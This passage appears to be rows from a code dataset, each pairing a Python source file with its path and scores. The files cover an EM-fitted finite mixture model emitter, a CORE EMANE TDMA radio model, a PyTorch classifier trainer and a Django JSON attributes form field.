Return the parameter type.
"""
return self._parameter_dtype
@property
def sample_dtype(self):
"""
Return the sample type.
"""
return self._distribution.sample_dtype
@property
def prior_dtype(self):
"""
Return the prior type.
"""
return self._prior_dtype
@property
def marginal_dtype(self):
"""
Return the marginal dtype.
"""
return self._distribution.average_dtype
@property
def K(self):
"""
The number of mixture components.
"""
return self._K
@property
def distribution(self):
"""
Return the mixture components.
"""
return self._distribution
class FiniteMixtureEmitter(object):
"""
Emit IR for the FiniteMixture distribution.
"""
def __init__(self, model):
"""
Initialize.
"""
self._model = model
self._sub_emitter = self._model.distribution.get_emitter()
def ll(self, parameter, sample, out):
"""
Compute finite-mixture log-likelihood.
"""
@Function.define(
Type.void(),
[parameter.data.type_, sample.data.type_, out.type_],
)
def finite_mixture_ll(parameter_data, sample_data, out_data):
self._ll(
parameter.using(parameter_data),
sample.using(sample_data),
out_data,
)
qy.return_()
finite_mixture_ll(parameter.data, sample.data, out)
def _ll(self, parameter, sample, out):
"""
Compute finite-mixture log-likelihood.
"""
total = qy.stack_allocate(float, -numpy.inf, "total")
component_ll = qy.stack_allocate(float)
@qy.for_(self._model._K)
def _(index):
component = parameter.at(index)
self._sub_emitter.ll(
StridedArray.from_typed_pointer(component.data.gep(0, 1)),
sample,
component_ll,
)
log_add_double(
total.load(),
qy.log(component.data.gep(0, 0).load()) + component_ll.load(),
) \
.store(total)
total.load().store(out)
def ml(self, samples, weights, out):
"""
Emit computation of the estimated maximum-likelihood parameter.
"""
@Function.define(
Type.void(),
[samples.data.type_, weights.data.type_, out.data.type_],
)
def finite_mixture_ml(samples_data, weights_data, out_data):
self._ml(
samples.using(samples_data),
weights.using(weights_data),
out.using(out_data),
)
finite_mixture_ml(samples.data, weights.data, out.data)
# XXX def _ml
def map(self, prior, samples, weights, out, initializations = 16):
"""
Emit computation of the estimated MAP parameter.
"""
@Function.define(
Type.void(),
[prior.data.type_, samples.data.type_, weights.data.type_, out.data.type_],
)
def finite_mixture_map(prior_data, samples_data, weights_data, out_data):
self._map(
prior.using(prior_data),
samples.using(samples_data),
weights.using(weights_data),
out.using(out_data),
initializations,
)
finite_mixture_map(prior.data, samples.data, weights.data, out.data)
def _map_initialize(self, prior, samples, weights, out, initializations):
"""
Emit parameter initialization for EM.
"""
# generate a random initial component assignment
K = self._model._K
N = samples.shape[0]
total = qy.stack_allocate(float)
best_ll = qy.stack_allocate(float, -numpy.inf)
assigns = StridedArray.heap_allocated(int, (K,))
best_assigns = StridedArray.heap_allocated(int, (K,))
@qy.for_(initializations)
def _(i):
@qy.for_(K)
def _(k):
# randomly assign the component
j = qy.random_int(N)
component = StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1))
j.store(assigns.at(k).data)
self._sub_emitter.map(
prior.at(k),
samples.at(j).envelop(),
weights.at(j).envelop(),
component,
)
# compute our total likelihood
qy.value_from_any(0.0).store(total)
@qy.for_(N)
def _(n):
sample = samples.at(n)
mixture_ll = total.load()
qy.value_from_any(-numpy.inf).store(total)
@qy.for_(K)
def _(k):
component_ll = total.load()
self._sub_emitter.ll(
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
sample,
total,
)
log_add_double(component_ll, total.load()).store(total)
(mixture_ll + total.load()).store(total)
# best observed so far?
@qy.if_(total.load() >= best_ll.load())
def _():
total.load().store(best_ll)
@qy.for_(K)
def _(k):
assigns.at(k).data.load().store(best_assigns.at(k).data)
# recompute the best observed assignment
@qy.for_(K)
def _(k):
j = assigns.at(k).data.load()
self._sub_emitter.ml(
samples.at(j).envelop(),
weights.at(j).envelop(),
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
)
qy.heap_free(assigns.data)
qy.heap_free(best_assigns.data)
# generate random initial component weights
@qy.for_(K)
def _(k):
r = qy.random()
r.store(out.at(k).data.gep(0, 0))
(total.load() + r).store(total)
@qy.for_(K)
def _(k):
p = out.at(k).data.gep(0, 0)
(p.load() / total.load()).store(p)
def _map(self, prior, samples, weights, out, initializations):
"""
Emit computation of the estimated maximum-likelihood parameter.
"""
# mise en place
K = self._model._K
N = samples.shape[0]
# generate some initial parameters
self._map_initialize(prior, samples, weights, out, initializations)
# run EM until convergence
total = qy.stack_allocate(float)
component_ll = qy.stack_allocate(float)
this_r_KN = StridedArray.heap_allocated(float, (K, N))
last_r_KN = StridedArray.heap_allocated(float, (K, N))
this_r_KN_data = Variable.set_to(this_r_KN.data)
last_r_KN_data = Variable.set_to(last_r_KN.data)
@qy.for_(self._model._iterations)
def _(i):
# compute responsibilities
r_KN = this_r_KN.using(this_r_KN_data.value)
@qy.for_(N)
def _(n):
sample = samples.at(n)
qy.value_from_any(-numpy.inf).store(total)
@qy.for_(K)
def _(k):
responsibility = r_KN.at(k, n).data
self._sub_emitter.ll(
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
StridedArray.from_typed_pointer(sample.data),
responsibility,
)
log_add_double(total.load(), responsibility.load()).store(total)
total_value = total.load()
@qy.if_else(total_value == -numpy.inf)
def _(then):
if then:
@qy.for_(K)
def _(k):
qy.value_from_any(1.0 / K).store(r_KN.at(k, n).data)
else:
@qy.for_(K)
def _(k):
responsibility = r_KN.at(k, n).data
qy.exp(responsibility.load() - total_value).store(responsibility)
# estimate new mixture and component parameters
@qy.for_(K)
def _(k):
component = out.at(k).data
self._sub_emitter.map(
prior.at(k),
samples,
r_KN.at(k),
StridedArray.from_typed_pointer(component.gep(0, 1)),
)
qy.value_from_any(0.0).store(total)
@qy.for_(N)
def _(n):
(total.load() + r_KN.at(k, n).data.load()).store(total)
(total.load() / float(N)).store(component.gep(0, 0))
# check for termination
last_r_KN = this_r_KN.using(last_r_KN_data.value)
@qy.if_(i > 0)
def _():
qy.value_from_any(0.0).store(total)
@qy.for_(K)
def _(k):
@qy.for_(N)
def _(n):
delta = r_KN.at(k, n).data.load() - last_r_KN.at(k, n).data.load()
(total.load() + abs(delta)).store(total)
@qy.if_(total.load() < 1e-12)
def _():
qy.break_()
total_delta = total.load()
# swap the responsibility matrices
temp_r_KN_data_value = this_r_KN_data.value
this_r_KN_data.set(last_r_KN_data.value)
last_r_KN_data.set(temp_r_KN_data_value)
# compute the ll at this step
@qy.for_(N)
def _(n):
sample = samples.at(n)
total_ll = total.load()
qy.value_from_any(-numpy.inf).store(total)
@qy.for_(K)
def _(k):
self._sub_emitter.ll(
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
StridedArray.from_typed_pointer(sample.data),
component_ll,
)
log_add_double(
total.load(),
qy.log(out.at(k).data.gep(0, 0).load()) + component_ll.load(),
) \
.store(total)
(total_ll + total.load()).store(total)
total_ll = total.load()
# be informative
qy.py_printf("after EM step %i: delta %s; ll %s\n", i, total_delta, total_ll)
# clean up
qy.heap_free(this_r_KN.data)
qy.heap_free(last_r_KN.data)
qy.return_()
def given(self, parameter, samples, out):
"""
Compute the conditional distribution.
"""
@Function.define(
Type.void(),
[parameter.data.type_, samples.data.type_, out.data.type_],
)
def finite_mixture_given(parameter_data, samples_data, out_data):
self._given(
parameter.using(parameter_data),
samples.using(samples_data),
out.using(out_data),
)
qy.return_()
finite_mixture_given(parameter.data, samples.data, out.data)
def _given(self, parameter, samples, out):
"""
Compute the conditional distribution.
"""
# mise en place
K = self._model._K
N = samples.shape[0]
# compute posterior mixture parameters
total = qy.stack_allocate(float, -numpy.inf)
@qy.for_(K)
def _(k):
prior_pi = parameter.at(k).data.gep(0, 0)
prior_parameter = parameter.at(k).data.gep(0, 1)
posterior_pi = out.at(k).data.gep(0, 0)
qy.log(prior_pi.load()).store(posterior_pi)
@qy.for_(N)
def _(n):
current_pi = posterior_pi.load()
self._sub_emitter.ll(
StridedArray.from_typed_pointer(prior_parameter),
samples.at(n),
posterior_pi,
)
(current_pi + posterior_pi.load()).store(posterior_pi)
log_add_double(total.load(), posterior_pi.load()).store(total)
total_value = total.load()
@qy.for_(K)
def _(k):
posterior_pi = out.at(k).data.gep(0, 0)
normalized_pi = posterior_pi.load() - total_value
qy.exp(normalized_pi).store(posterior_pi)
# compute posterior component parameters
@qy.for_(K)
def _(k):
prior_parameter = parameter.at(k).data.gep(0, 1)
posterior_parameter = out.at(k).data.gep(0, 1)
self._sub_emitter.given(
StridedArray.from_typed_pointer(prior_parameter),
samples,
StridedArray.from_typed_pointer(posterior_parameter),
)
def marginal(self, parameter, out):
"""
Compute the marginal distribution.
"""
@Function.define(
Type.void(),
[parameter.data.type_, out.data.type_],
)
def finite_mixture_marginal(parameter_data, out_data):
self._marginal(
parameter.using(parameter_data),
out.using(out_data),
)
finite_mixture_marginal(parameter.data, out.data)
def _marginal(self, parameter, out):
"""
Compute the marginal distribution.
"""
self._sub_emitter.average(
parameter.extract(0, 0),
parameter.extract(0, 1),
out,
)
qy.return_() | src/python/cargo/statistics/mixture.py | import sys
import numpy
import llvm.core
import qy
from qy import (
get_qy,
Function,
Variable,
StridedArray,
StridedArrays,
)
from llvm.core import (
Type,
Constant,
)
from cargo.log import get_logger
logger = get_logger(__name__)
def log_add_double(x, y):
"""
Return log(x + y) given log(x) and log(y); see [1].
[1] Digital Filtering Using Logarithmic Arithmetic.
Kingsbury and Rayner, 1970.
"""
if "log_add_d" in get_qy().module.global_variables:
log_add_d = Function.get_named("log_add_d")
else:
@Function.define(float, [float, float])
def log_add_d(x_in, y_in):
s = x_in >= y_in
a = qy.select(s, x_in, y_in)
@qy.if_else(a == -numpy.inf)
def _(then):
if then:
qy.return_(-numpy.inf)
else:
qy.return_(a + qy.log1p(qy.exp(qy.select(s, y_in, x_in) - a)))
return log_add_d(x, y)
class FiniteMixture(object):
"""
An arbitrary finite homogeneous mixture distribution.
"""
def __init__(self, distribution, K, iterations = 256, convergence = 1e-8):
"""
Initialize.
"""
self._distribution = distribution
self._K = K
self._iterations = iterations
self._convergence = convergence
self._parameter_dtype = \
numpy.dtype((
[
("p", numpy.float64),
("c", distribution.parameter_dtype),
],
(K,),
))
self._prior_dtype = numpy.dtype((distribution.prior_dtype, (K,)))
def get_emitter(self):
"""
Return an IR emitter for this distribution.
"""
return FiniteMixtureEmitter(self)
def posterior(self, parameter, samples):
"""
Return the posterior mixture weights.
"""
# compute the component likelihoods
post = numpy.ndarray(self.K)
for i in xrange(self.K):
ll = parameter[i]["p"]
for j in xrange(len(samples)):
ll += self.distribution.ll(parameter[i]["c"], samples[j])
post[i] = ll
# normalize and exponentiate
from cargo.statistics.functions import log_plus_all
post[:] -= log_plus_all(post)
numpy.exp(post, post)
return post
@property
def parameter_dtype(self):
"""
Return the parameter type.
"""
return self._parameter_dtype
@property
def sample_dtype(self):
"""
Return the sample type.
"""
return self._distribution.sample_dtype
@property
def prior_dtype(self):
"""
Return the prior type.
"""
return self._prior_dtype
@property
def marginal_dtype(self):
"""
Return the marginal dtype.
"""
return self._distribution.average_dtype
@property
def K(self):
"""
The number of mixture components.
"""
return self._K
@property
def distribution(self):
"""
Return the mixture components.
"""
return self._distribution
class FiniteMixtureEmitter(object):
"""
Emit IR for the FiniteMixture distribution.
"""
def __init__(self, model):
"""
Initialize.
"""
self._model = model
self._sub_emitter = self._model.distribution.get_emitter()
def ll(self, parameter, sample, out):
"""
Compute finite-mixture log-likelihood.
"""
@Function.define(
Type.void(),
[parameter.data.type_, sample.data.type_, out.type_],
)
def finite_mixture_ll(parameter_data, sample_data, out_data):
self._ll(
parameter.using(parameter_data),
sample.using(sample_data),
out_data,
)
qy.return_()
finite_mixture_ll(parameter.data, sample.data, out)
def _ll(self, parameter, sample, out):
"""
Compute finite-mixture log-likelihood.
"""
total = qy.stack_allocate(float, -numpy.inf, "total")
component_ll = qy.stack_allocate(float)
@qy.for_(self._model._K)
def _(index):
component = parameter.at(index)
self._sub_emitter.ll(
StridedArray.from_typed_pointer(component.data.gep(0, 1)),
sample,
component_ll,
)
log_add_double(
total.load(),
qy.log(component.data.gep(0, 0).load()) + component_ll.load(),
) \
.store(total)
total.load().store(out)
def ml(self, samples, weights, out):
"""
Emit computation of the estimated maximum-likelihood parameter.
"""
@Function.define(
Type.void(),
[samples.data.type_, weights.data.type_, out.data.type_],
)
def finite_mixture_ml(samples_data, weights_data, out_data):
self._ml(
samples.using(samples_data),
weights.using(weights_data),
out.using(out_data),
)
finite_mixture_ml(samples.data, weights.data, out.data)
# XXX def _ml
def map(self, prior, samples, weights, out, initializations = 16):
"""
Emit computation of the estimated MAP parameter.
"""
@Function.define(
Type.void(),
[prior.data.type_, samples.data.type_, weights.data.type_, out.data.type_],
)
def finite_mixture_map(prior_data, samples_data, weights_data, out_data):
self._map(
prior.using(prior_data),
samples.using(samples_data),
weights.using(weights_data),
out.using(out_data),
initializations,
)
finite_mixture_map(prior.data, samples.data, weights.data, out.data)
def _map_initialize(self, prior, samples, weights, out, initializations):
"""
Emit parameter initialization for EM.
"""
# generate a random initial component assignment
K = self._model._K
N = samples.shape[0]
total = qy.stack_allocate(float)
best_ll = qy.stack_allocate(float, -numpy.inf)
assigns = StridedArray.heap_allocated(int, (K,))
best_assigns = StridedArray.heap_allocated(int, (K,))
@qy.for_(initializations)
def _(i):
@qy.for_(K)
def _(k):
# randomly assign the component
j = qy.random_int(N)
component = StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1))
j.store(assigns.at(k).data)
self._sub_emitter.map(
prior.at(k),
samples.at(j).envelop(),
weights.at(j).envelop(),
component,
)
# compute our total likelihood
qy.value_from_any(0.0).store(total)
@qy.for_(N)
def _(n):
sample = samples.at(n)
mixture_ll = total.load()
qy.value_from_any(-numpy.inf).store(total)
@qy.for_(K)
def _(k):
component_ll = total.load()
self._sub_emitter.ll(
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
sample,
total,
)
log_add_double(component_ll, total.load()).store(total)
(mixture_ll + total.load()).store(total)
# best observed so far?
@qy.if_(total.load() >= best_ll.load())
def _():
total.load().store(best_ll)
@qy.for_(K)
def _(k):
assigns.at(k).data.load().store(best_assigns.at(k).data)
# recompute the best observed assignment
@qy.for_(K)
def _(k):
j = assigns.at(k).data.load()
self._sub_emitter.ml(
samples.at(j).envelop(),
weights.at(j).envelop(),
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
)
qy.heap_free(assigns.data)
qy.heap_free(best_assigns.data)
# generate random initial component weights
@qy.for_(K)
def _(k):
r = qy.random()
r.store(out.at(k).data.gep(0, 0))
(total.load() + r).store(total)
@qy.for_(K)
def _(k):
p = out.at(k).data.gep(0, 0)
(p.load() / total.load()).store(p)
def _map(self, prior, samples, weights, out, initializations):
"""
Emit computation of the estimated maximum-likelihood parameter.
"""
# mise en place
K = self._model._K
N = samples.shape[0]
# generate some initial parameters
self._map_initialize(prior, samples, weights, out, initializations)
# run EM until convergence
total = qy.stack_allocate(float)
component_ll = qy.stack_allocate(float)
this_r_KN = StridedArray.heap_allocated(float, (K, N))
last_r_KN = StridedArray.heap_allocated(float, (K, N))
this_r_KN_data = Variable.set_to(this_r_KN.data)
last_r_KN_data = Variable.set_to(last_r_KN.data)
@qy.for_(self._model._iterations)
def _(i):
# compute responsibilities
r_KN = this_r_KN.using(this_r_KN_data.value)
@qy.for_(N)
def _(n):
sample = samples.at(n)
qy.value_from_any(-numpy.inf).store(total)
@qy.for_(K)
def _(k):
responsibility = r_KN.at(k, n).data
self._sub_emitter.ll(
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
StridedArray.from_typed_pointer(sample.data),
responsibility,
)
log_add_double(total.load(), responsibility.load()).store(total)
total_value = total.load()
@qy.if_else(total_value == -numpy.inf)
def _(then):
if then:
@qy.for_(K)
def _(k):
qy.value_from_any(1.0 / K).store(r_KN.at(k, n).data)
else:
@qy.for_(K)
def _(k):
responsibility = r_KN.at(k, n).data
qy.exp(responsibility.load() - total_value).store(responsibility)
# estimate new mixture and component parameters
@qy.for_(K)
def _(k):
component = out.at(k).data
self._sub_emitter.map(
prior.at(k),
samples,
r_KN.at(k),
StridedArray.from_typed_pointer(component.gep(0, 1)),
)
qy.value_from_any(0.0).store(total)
@qy.for_(N)
def _(n):
(total.load() + r_KN.at(k, n).data.load()).store(total)
(total.load() / float(N)).store(component.gep(0, 0))
# check for termination
last_r_KN = this_r_KN.using(last_r_KN_data.value)
@qy.if_(i > 0)
def _():
qy.value_from_any(0.0).store(total)
@qy.for_(K)
def _(k):
@qy.for_(N)
def _(n):
delta = r_KN.at(k, n).data.load() - last_r_KN.at(k, n).data.load()
(total.load() + abs(delta)).store(total)
@qy.if_(total.load() < 1e-12)
def _():
qy.break_()
total_delta = total.load()
# swap the responsibility matrices
temp_r_KN_data_value = this_r_KN_data.value
this_r_KN_data.set(last_r_KN_data.value)
last_r_KN_data.set(temp_r_KN_data_value)
# compute the ll at this step
@qy.for_(N)
def _(n):
sample = samples.at(n)
total_ll = total.load()
qy.value_from_any(-numpy.inf).store(total)
@qy.for_(K)
def _(k):
self._sub_emitter.ll(
StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
StridedArray.from_typed_pointer(sample.data),
component_ll,
)
log_add_double(
total.load(),
qy.log(out.at(k).data.gep(0, 0).load()) + component_ll.load(),
) \
.store(total)
(total_ll + total.load()).store(total)
total_ll = total.load()
# be informative
qy.py_printf("after EM step %i: delta %s; ll %s\n", i, total_delta, total_ll)
# clean up
qy.heap_free(this_r_KN.data)
qy.heap_free(last_r_KN.data)
qy.return_()
def given(self, parameter, samples, out):
"""
Compute the conditional distribution.
"""
@Function.define(
Type.void(),
[parameter.data.type_, samples.data.type_, out.data.type_],
)
def finite_mixture_given(parameter_data, samples_data, out_data):
self._given(
parameter.using(parameter_data),
samples.using(samples_data),
out.using(out_data),
)
qy.return_()
finite_mixture_given(parameter.data, samples.data, out.data)
def _given(self, parameter, samples, out):
"""
Compute the conditional distribution.
"""
# mise en place
K = self._model._K
N = samples.shape[0]
# compute posterior mixture parameters
total = qy.stack_allocate(float, -numpy.inf)
@qy.for_(K)
def _(k):
prior_pi = parameter.at(k).data.gep(0, 0)
prior_parameter = parameter.at(k).data.gep(0, 1)
posterior_pi = out.at(k).data.gep(0, 0)
qy.log(prior_pi.load()).store(posterior_pi)
@qy.for_(N)
def _(n):
current_pi = posterior_pi.load()
self._sub_emitter.ll(
StridedArray.from_typed_pointer(prior_parameter),
samples.at(n),
posterior_pi,
)
(current_pi + posterior_pi.load()).store(posterior_pi)
log_add_double(total.load(), posterior_pi.load()).store(total)
total_value = total.load()
@qy.for_(K)
def _(k):
posterior_pi = out.at(k).data.gep(0, 0)
normalized_pi = posterior_pi.load() - total_value
qy.exp(normalized_pi).store(posterior_pi)
# compute posterior component parameters
@qy.for_(K)
def _(k):
prior_parameter = parameter.at(k).data.gep(0, 1)
posterior_parameter = out.at(k).data.gep(0, 1)
self._sub_emitter.given(
StridedArray.from_typed_pointer(prior_parameter),
samples,
StridedArray.from_typed_pointer(posterior_parameter),
)
def marginal(self, parameter, out):
"""
Compute the marginal distribution.
"""
@Function.define(
Type.void(),
[parameter.data.type_, out.data.type_],
)
def finite_mixture_marginal(parameter_data, out_data):
self._marginal(
parameter.using(parameter_data),
out.using(out_data),
)
finite_mixture_marginal(parameter.data, out.data)
def _marginal(self, parameter, out):
"""
Compute the marginal distribution.
"""
self._sub_emitter.average(
parameter.extract(0, 0),
parameter.extract(0, 1),
out,
)
qy.return_() | 0.677261 | 0.412619 |
import logging
from pathlib import Path
from typing import Set
from core import constants, utils
from core.config import ConfigString
from core.emane import emanemodel
from core.emane.nodes import EmaneNet
from core.nodes.interface import CoreInterface
logger = logging.getLogger(__name__)
class EmaneTdmaModel(emanemodel.EmaneModel):
# model name
name: str = "emane_tdma"
# mac configuration
mac_library: str = "tdmaeventschedulerradiomodel"
mac_xml: str = "tdmaeventschedulerradiomodel.xml"
# add custom schedule options and ignore it when writing emane xml
schedule_name: str = "schedule"
default_schedule: Path = (
constants.CORE_DATA_DIR / "examples" / "tdma" / "schedule.xml"
)
config_ignore: Set[str] = {schedule_name}
@classmethod
def load(cls, emane_prefix: Path) -> None:
cls.mac_defaults["pcrcurveuri"] = str(
emane_prefix
/ "share/emane/xml/models/mac/tdmaeventscheduler/tdmabasemodelpcr.xml"
)
super().load(emane_prefix)
config_item = ConfigString(
id=cls.schedule_name,
default=str(cls.default_schedule),
label="TDMA schedule file (core)",
)
cls.mac_config.insert(0, config_item)
def post_startup(self, iface: CoreInterface) -> None:
# get configured schedule
emane_net = self.session.get_node(self.id, EmaneNet)
config = self.session.emane.get_iface_config(emane_net, iface)
schedule = Path(config[self.schedule_name])
if not schedule.is_file():
logger.error("ignoring invalid tdma schedule: %s", schedule)
return
# initiate tdma schedule
nem_id = self.session.emane.get_nem_id(iface)
if not nem_id:
logger.error("could not find nem for interface")
return
service = self.session.emane.nem_service.get(nem_id)
if service:
device = service.device
logger.info(
"setting up tdma schedule: schedule(%s) device(%s)", schedule, device
)
utils.cmd(f"emaneevent-tdmaschedule -i {device} {schedule}") | daemon/core/emane/models/tdma.py | import logging
from pathlib import Path
from typing import Set
from core import constants, utils
from core.config import ConfigString
from core.emane import emanemodel
from core.emane.nodes import EmaneNet
from core.nodes.interface import CoreInterface
logger = logging.getLogger(__name__)
class EmaneTdmaModel(emanemodel.EmaneModel):
# model name
name: str = "emane_tdma"
# mac configuration
mac_library: str = "tdmaeventschedulerradiomodel"
mac_xml: str = "tdmaeventschedulerradiomodel.xml"
# add custom schedule options and ignore it when writing emane xml
schedule_name: str = "schedule"
default_schedule: Path = (
constants.CORE_DATA_DIR / "examples" / "tdma" / "schedule.xml"
)
config_ignore: Set[str] = {schedule_name}
@classmethod
def load(cls, emane_prefix: Path) -> None:
cls.mac_defaults["pcrcurveuri"] = str(
emane_prefix
/ "share/emane/xml/models/mac/tdmaeventscheduler/tdmabasemodelpcr.xml"
)
super().load(emane_prefix)
config_item = ConfigString(
id=cls.schedule_name,
default=str(cls.default_schedule),
label="TDMA schedule file (core)",
)
cls.mac_config.insert(0, config_item)
def post_startup(self, iface: CoreInterface) -> None:
# get configured schedule
emane_net = self.session.get_node(self.id, EmaneNet)
config = self.session.emane.get_iface_config(emane_net, iface)
schedule = Path(config[self.schedule_name])
if not schedule.is_file():
logger.error("ignoring invalid tdma schedule: %s", schedule)
return
# initiate tdma schedule
nem_id = self.session.emane.get_nem_id(iface)
if not nem_id:
logger.error("could not find nem for interface")
return
service = self.session.emane.nem_service.get(nem_id)
if service:
device = service.device
logger.info(
"setting up tdma schedule: schedule(%s) device(%s)", schedule, device
)
utils.cmd(f"emaneevent-tdmaschedule -i {device} {schedule}") | 0.706697 | 0.105395 |
import os
import time
from tqdm import tqdm
import torch
import torch.nn as nn
from metrics.loss_metric import LossMetric
from metrics.accuracy_metric import AccuracyMetric
from metrics.classification_learning_curves import ClassificationLearningCurves
class ClassifierTrainer:
def __init__(self, device, model, training_dataset, validation_dataset, output_path='', epoch_count=10,
learning_rate=0.01, batch_size=128):
self._device = device
self._output_path = output_path
os.makedirs(self._output_path, exist_ok=True)
self._epoch_count = epoch_count
self._batch_size = batch_size
if device.type == 'cuda' and torch.cuda.device_count() > 1:
print("DataParallel - GPU count:", torch.cuda.device_count())
model = nn.DataParallel(model)
self._model = model.to(device)
self._optimizer = torch.optim.Adam(self._model.parameters(), lr=learning_rate)
self._scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(self._optimizer, epoch_count)
self._criterion = nn.CrossEntropyLoss()
self._training_dataset_loader = torch.utils.data.DataLoader(training_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4)
self._validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4)
self._training_loss_metric = LossMetric()
self._training_accuracy_metric = AccuracyMetric()
self._validation_loss_metric = LossMetric()
self._validation_accuracy_metric = AccuracyMetric()
self._learning_curves = ClassificationLearningCurves()
def train(self):
self._learning_curves.clear()
for epoch in range(self._epoch_count):
print('Training - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
time.sleep(0.1) # To prevent tqdm glitches
self._train_one_epoch()
print('\nValidation - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
time.sleep(0.1) # To prevent tqdm glitches
self._validate()
self._scheduler.step()
self._print_performances()
self._save_learning_curves()
self._save_states(epoch + 1)
def _train_one_epoch(self):
self._training_loss_metric.clear()
self._training_accuracy_metric.clear()
self._model.train()
for image, target in tqdm(self._training_dataset_loader):
predicted_class_scores = self._model(image.to(self._device))
target = target.to(self._device)
loss = self._criterion(predicted_class_scores, target)
self._optimizer.zero_grad()
loss.backward()
self._optimizer.step()
self._training_loss_metric.add(loss.item())
self._training_accuracy_metric.add(predicted_class_scores, target)
def _validate(self):
self._validation_loss_metric.clear()
self._validation_accuracy_metric.clear()
self._model.eval()
for image, target in tqdm(self._validation_dataset_loader):
predicted_class_scores = self._model(image.to(self._device))
target = target.to(self._device)
loss = self._criterion(predicted_class_scores, target)
self._validation_loss_metric.add(loss.item())
self._validation_accuracy_metric.add(predicted_class_scores, target)
def _print_performances(self):
print('\nTraining : Loss={}, Accuracy={}'.format(self._training_loss_metric.get_loss(),
self._training_accuracy_metric.get_accuracy()))
print('Validation : Loss={}, Accuracy={}\n'.format(self._validation_loss_metric.get_loss(),
self._validation_accuracy_metric.get_accuracy()))
def _save_learning_curves(self):
self._learning_curves.add_training_loss_value(self._training_loss_metric.get_loss())
self._learning_curves.add_training_accuracy_value(self._training_accuracy_metric.get_accuracy())
self._learning_curves.add_validation_loss_value(self._validation_loss_metric.get_loss())
self._learning_curves.add_validation_accuracy_value(self._validation_accuracy_metric.get_accuracy())
self._learning_curves.save_figure(os.path.join(self._output_path, 'learning_curves.png'))
def _save_states(self, epoch):
torch.save(self._model.state_dict(),
os.path.join(self._output_path, 'model_checkpoint_epoch_{}.pth'.format(epoch))) | classifier_trainer.py | import os
import time
from tqdm import tqdm
import torch
import torch.nn as nn
from metrics.loss_metric import LossMetric
from metrics.accuracy_metric import AccuracyMetric
from metrics.classification_learning_curves import ClassificationLearningCurves
class ClassifierTrainer:
def __init__(self, device, model, training_dataset, validation_dataset, output_path='', epoch_count=10,
learning_rate=0.01, batch_size=128):
self._device = device
self._output_path = output_path
os.makedirs(self._output_path, exist_ok=True)
self._epoch_count = epoch_count
self._batch_size = batch_size
if device.type == 'cuda' and torch.cuda.device_count() > 1:
print("DataParallel - GPU count:", torch.cuda.device_count())
model = nn.DataParallel(model)
self._model = model.to(device)
self._optimizer = torch.optim.Adam(self._model.parameters(), lr=learning_rate)
self._scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(self._optimizer, epoch_count)
self._criterion = nn.CrossEntropyLoss()
self._training_dataset_loader = torch.utils.data.DataLoader(training_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4)
self._validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4)
self._training_loss_metric = LossMetric()
self._training_accuracy_metric = AccuracyMetric()
self._validation_loss_metric = LossMetric()
self._validation_accuracy_metric = AccuracyMetric()
self._learning_curves = ClassificationLearningCurves()
def train(self):
self._learning_curves.clear()
for epoch in range(self._epoch_count):
print('Training - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
time.sleep(0.1) # To prevent tqdm glitches
self._train_one_epoch()
print('\nValidation - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
time.sleep(0.1) # To prevent tqdm glitches
self._validate()
self._scheduler.step()
self._print_performances()
self._save_learning_curves()
self._save_states(epoch + 1)
def _train_one_epoch(self):
self._training_loss_metric.clear()
self._training_accuracy_metric.clear()
self._model.train()
for image, target in tqdm(self._training_dataset_loader):
predicted_class_scores = self._model(image.to(self._device))
target = target.to(self._device)
loss = self._criterion(predicted_class_scores, target)
self._optimizer.zero_grad()
loss.backward()
self._optimizer.step()
self._training_loss_metric.add(loss.item())
self._training_accuracy_metric.add(predicted_class_scores, target)
def _validate(self):
self._validation_loss_metric.clear()
self._validation_accuracy_metric.clear()
self._model.eval()
for image, target in tqdm(self._validation_dataset_loader):
predicted_class_scores = self._model(image.to(self._device))
target = target.to(self._device)
loss = self._criterion(predicted_class_scores, target)
self._validation_loss_metric.add(loss.item())
self._validation_accuracy_metric.add(predicted_class_scores, target)
def _print_performances(self):
print('\nTraining : Loss={}, Accuracy={}'.format(self._training_loss_metric.get_loss(),
self._training_accuracy_metric.get_accuracy()))
print('Validation : Loss={}, Accuracy={}\n'.format(self._validation_loss_metric.get_loss(),
self._validation_accuracy_metric.get_accuracy()))
def _save_learning_curves(self):
self._learning_curves.add_training_loss_value(self._training_loss_metric.get_loss())
self._learning_curves.add_training_accuracy_value(self._training_accuracy_metric.get_accuracy())
self._learning_curves.add_validation_loss_value(self._validation_loss_metric.get_loss())
self._learning_curves.add_validation_accuracy_value(self._validation_accuracy_metric.get_accuracy())
self._learning_curves.save_figure(os.path.join(self._output_path, 'learning_curves.png'))
def _save_states(self, epoch):
torch.save(self._model.state_dict(),
os.path.join(self._output_path, 'model_checkpoint_epoch_{}.pth'.format(epoch))) | 0.825238 | 0.212865 |
import django
from django.forms import MultiValueField, CharField
from attributesjsonfield.widgets import AttributesJSONWidget
class AttributesJSONField(MultiValueField):
""" """
widget = AttributesJSONWidget
def __init__(self, *args, attributes=None, require_all_fields=False, **kwargs):
self.attributes = attributes
self.clean_attributes = []
if self.attributes:
for attr in self.attributes:
is_dict = type(attr) == dict
field = attr["field"] if is_dict else attr
if is_dict:
label = attr.get("verbose_name", field)
required = attr.get("required", True)
else:
label = field
required = True
self.clean_attributes.append(
{
"field": field,
"label": label,
"name": field,
"choices": attr.get("choices") if is_dict else None,
"required": required,
"default": attr.get("default") if is_dict else None,
"data_type": attr.get("data_type") if is_dict else None,
}
)
else:
self.clean_attributes = None
